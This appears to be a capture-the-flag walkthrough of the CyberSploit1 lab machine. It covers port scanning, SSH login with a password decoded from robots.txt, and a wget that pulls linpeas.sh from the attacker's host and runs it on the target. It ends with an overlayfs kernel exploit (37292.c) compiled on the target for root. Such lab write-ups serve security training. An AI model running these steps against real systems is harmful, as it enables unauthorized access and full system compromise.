CyberSploit1

nmap

(base) [psdon@arch CyberSploit1]$ mkdir nmap
(base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan                                                                                    
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.                                                                                                                                                             
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                                                                                                                                                             
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                                                                                                                                                             
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                                                                                                                                                             
The Modern Day Port Scanner.                                                                                                                                                                                         
________________________________________                                                                                                                                                                             
: https://discord.gg/GFrQsGy           :                                                                                                                                                                             
: https://github.com/RustScan/RustScan :                                                                                                                                                                             
 --------------------------------------                                                                                                                                                                              
Real hackers hack time ⌛                                                                                                                                                                                             
                                                                                                                                                                                                                     
[~] The config file is expected to be at "/root/.rustscan.toml"                                                                                                                                                      
[~] Automatically increasing ulimit value to 5000.                                                                                                                                                                   
Open 192.168.217.92:22                                                                                                                                                                                               
Open 192.168.217.92:80

A web server on port 80 is open

Let's checked the source code of the page, and we can find a possible username on there.

Let's also checked the robots.txt and as you can see, we have found a base64 encoded string

We can decode it by executing the following command

(base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode                                                                                                        
cybersploit{youtube.com/c/cybersploit}

Exploitation

Let's try to log in using the username of itsskv and use the decoded string as a password

(base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92                                                      
This key is not known by any other names                                                                  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                  
Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts.                           
itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit}                                                                          
itsskv@cybersploit-CTF:~$

Looks like we have successfully gained an initial shell. Sweet :D

Post Exploitation

First, let's transfer linpeas.sh from our machine to the target machine

(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

You can find the machine IP address by executing the following.

(base) [psdon@arch CyberSploit1]$ ip a | grep tun                                                         
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qle
n 500                                                                                                     
    inet 192.168.49.217/24 scope global tun0                                                              
(base) [psdon@arch CyberSploit1]$

Then transfer the script using wget

itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh                                                                                                                                                      
--2021-08-27 02:16:13--  http://192.168.49.217/linpeas.sh                                                                                                                                                            
Connecting to 192.168.49.217:80... connected.                                                                                                                                                                        
HTTP request sent, awaiting response... 200 OK                                                                                                                                                                       
Length: 458110 (447K) [application/x-sh]                                                                                                                                                                             
Saving to: `linpeas.sh'                                                                                                                                                                                              
                                                                                                                                                                                                                     
100%[================================================================>] 4,58,110     147K/s   in 3.0s                                                                                                                
                                                                                                                                                                                                                     
2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110]                                                                                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                   
itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh

And now we can run linpeas.sh

itsskv@cybersploit-CTF:~$ ./linpeas.sh                                                                                                                                                                               
                                                                                                                                                                                                                     
                                                                                                                                                                                                                     
                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                                           
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄                                                                                                                                                                     
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄                                                                                                                                                                 
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄                                                                                                                                                            
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄                                                                                                                                                          
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄                                                                                                                                                           
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄                                                                                                                                                          
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄                                                                                                                                                          
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄                                                                                                                                                          
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄                                                                                                                                                          
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄                                                                                                                                                          
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄                                                                                                                                                           
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                           
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                          
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀                                                                                                                                                           
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀                                                                                                                                                                    
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀                                                                                                                                                                         
                                                                                                                                                                                                                     
      /---------------------------------------------------------------------------\                                                                                                                                  
      |                             Do you like PEASS?                            |                                                                                                                                  
      |---------------------------------------------------------------------------|                                                                                                                                  
      |         Become a Patreon    :     https://www.patreon.com/peass           |                                                                                                                                  
      |         Follow on Twitter   :     @carlospolopm                           |                                                                                                                                  
      |         Respect on HTB      :     SirBroccoli & makikvues                 |                                                                                                                                  
      |---------------------------------------------------------------------------|                                                                                                                                  
      |                                 Thank you!                                |                                                                                                                                  
      \---------------------------------------------------------------------------/                                                                                                                                  
        linpeas-ng by carlospolop

Right of the bat, you can see the version of the Linux Kernel it is running.

We can check this Linux Kernel version with searchsploit and I found out it is vulnerable to overlayf exploit.

Privilege Escalation

Let's mirror the exploit to our current working directory, and copy the content of the file to the clipboard

xclip -selection clipboard -i < 37292.c

And paste it to the target machine

nano e.c

We can compile the C source code using gcc binary installed in the target machine. And right after running the exploit, we got root in the target machine.

Thanks, and enjoy! :D

PreviousBTRSys2.1 NextSunsetNoontide

Last updated 4 years ago

hashtagnmap

hashtagExploitation

hashtagPost Exploitation

hashtagPrivilege Escalation

nmap

Exploitation

Post Exploitation

Privilege Escalation